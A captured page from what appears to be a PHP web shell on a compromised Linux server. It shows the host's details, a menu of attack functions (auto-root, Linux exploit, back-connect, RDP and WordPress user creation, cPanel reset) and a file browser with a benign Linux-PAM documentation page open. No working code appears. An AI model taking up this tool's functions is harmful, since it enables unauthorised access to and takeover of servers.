Linux server.nvwebsoft.co.in 3.10.0-1160.114.2.el7.x86_64 #1 SMP Wed Mar 20 15:54:52 UTC 2024 x86_64
Apache
: 162.240.12.249 | : 3.145.58.230
202 Domain
8.1.31
nbspublicschool
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
usr /
share /
doc /
pam-devel-1.1.8 /
html /
[ HOME SHELL ]
Name
Size
Permission
Action
Linux-PAM_ADG.html
8.41
KB
-rw-r--r--
Linux-PAM_MWG.html
8.59
KB
-rw-r--r--
adg-author.html
3.02
KB
-rw-r--r--
adg-copyright.html
3.54
KB
-rw-r--r--
adg-example.html
3.59
KB
-rw-r--r--
adg-files.html
2.18
KB
-rw-r--r--
adg-glossary.html
3.21
KB
-rw-r--r--
adg-interface-by-app-expected....
61.01
KB
-rw-r--r--
adg-interface-of-app-expected....
8.26
KB
-rw-r--r--
adg-interface-programming-note...
2.55
KB
-rw-r--r--
adg-interface.html
4.9
KB
-rw-r--r--
adg-introduction-description.h...
3.29
KB
-rw-r--r--
adg-introduction-synopsis.html
2.62
KB
-rw-r--r--
adg-introduction.html
2.01
KB
-rw-r--r--
adg-libpam-functions.html
13.13
KB
-rw-r--r--
adg-libpam_misc.html
3.34
KB
-rw-r--r--
adg-overview.html
8.16
KB
-rw-r--r--
adg-porting.html
4.2
KB
-rw-r--r--
adg-security-conv-function.htm...
2.29
KB
-rw-r--r--
adg-security-library-calls.htm...
3.13
KB
-rw-r--r--
adg-security-resources.html
2.83
KB
-rw-r--r--
adg-security-service-name.html
4.43
KB
-rw-r--r--
adg-security-user-identity.htm...
5.38
KB
-rw-r--r--
adg-security.html
3.73
KB
-rw-r--r--
adg-see-also.html
2.16
KB
-rw-r--r--
mwg-author.html
3
KB
-rw-r--r--
mwg-copyright.html
3.52
KB
-rw-r--r--
mwg-example.html
1.96
KB
-rw-r--r--
mwg-expected-by-module-item.ht...
45.36
KB
-rw-r--r--
mwg-expected-by-module-other.h...
8.15
KB
-rw-r--r--
mwg-expected-by-module.html
4.02
KB
-rw-r--r--
mwg-expected-of-module-acct.ht...
6.05
KB
-rw-r--r--
mwg-expected-of-module-auth.ht...
10.73
KB
-rw-r--r--
mwg-expected-of-module-chautht...
7.8
KB
-rw-r--r--
mwg-expected-of-module-overvie...
6.28
KB
-rw-r--r--
mwg-expected-of-module-session...
6.98
KB
-rw-r--r--
mwg-expected-of-module.html
4.27
KB
-rw-r--r--
mwg-introduction-description.h...
3.88
KB
-rw-r--r--
mwg-introduction-synopsis.html
1.98
KB
-rw-r--r--
mwg-introduction.html
1.98
KB
-rw-r--r--
mwg-see-also.html
2.18
KB
-rw-r--r--
mwg-see-options.html
2.92
KB
-rw-r--r--
mwg-see-programming-libs.html
2.94
KB
-rw-r--r--
mwg-see-programming-sec.html
8.92
KB
-rw-r--r--
mwg-see-programming-syslog.htm...
4.63
KB
-rw-r--r--
mwg-see-programming.html
3
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : adg-security-resources.html
<html><head><meta http-equiv="Content-Type" content="text/html; charset=UTF-8"><title>4.5. Sufficient resources</title><meta name="generator" content="DocBook XSL Stylesheets V1.78.1"><link rel="home" href="Linux-PAM_ADG.html" title="The Linux-PAM Application Developers' Guide"><link rel="up" href="adg-security.html" title="Chapter 4. Security issues of Linux-PAM"><link rel="prev" href="adg-security-user-identity.html" title="4.4. The identity of the user"><link rel="next" href="adg-libpam_misc.html" title="Chapter 5. A library of miscellaneous helper functions"></head><body bgcolor="white" text="black" link="#0000FF" vlink="#840084" alink="#0000FF"><div class="navheader"><table width="100%" summary="Navigation header"><tr><th colspan="3" align="center">4.5. Sufficient resources</th></tr><tr><td width="20%" align="left"><a accesskey="p" href="adg-security-user-identity.html">Prev</a> </td><th width="60%" align="center">Chapter 4. Security issues of <span class="emphasis"><em>Linux-PAM</em></span> </th><td width="20%" align="right"> <a accesskey="n" href="adg-libpam_misc.html">Next</a></td></tr></table><hr></div><div class="section"><div class="titlepage"><div><div><h2 class="title" style="clear: both"><a name="adg-security-resources"></a>4.5. Sufficient resources</h2></div></div></div><p> Care should be taken to ensure that the proper execution of an application is not compromised by a lack of system resources. If an application is unable to open sufficient files to perform its service, it should fail gracefully, or request additional resources. Specifically, the quantities manipulated by the <span class="citerefentry"><span class="refentrytitle">setrlimit</span>(2)</span> family of commands should be taken into consideration. </p><p> This is also true of conversation prompts. The application should not accept prompts of arbitrary length with out checking for resource allocation failure and dealing with such extreme conditions gracefully and in a manner that preserves the PAM API. Such tolerance may be especially important when attempting to track a malicious adversary. </p></div><div class="navfooter"><hr><table width="100%" summary="Navigation footer"><tr><td width="40%" align="left"><a accesskey="p" href="adg-security-user-identity.html">Prev</a> </td><td width="20%" align="center"><a accesskey="u" href="adg-security.html">Up</a></td><td width="40%" align="right"> <a accesskey="n" href="adg-libpam_misc.html">Next</a></td></tr><tr><td width="40%" align="left" valign="top">4.4. The identity of the user </td><td width="20%" align="center"><a accesskey="h" href="Linux-PAM_ADG.html">Home</a></td><td width="40%" align="right" valign="top"> Chapter 5. A library of miscellaneous helper functions</td></tr></table></div></body></html>
Close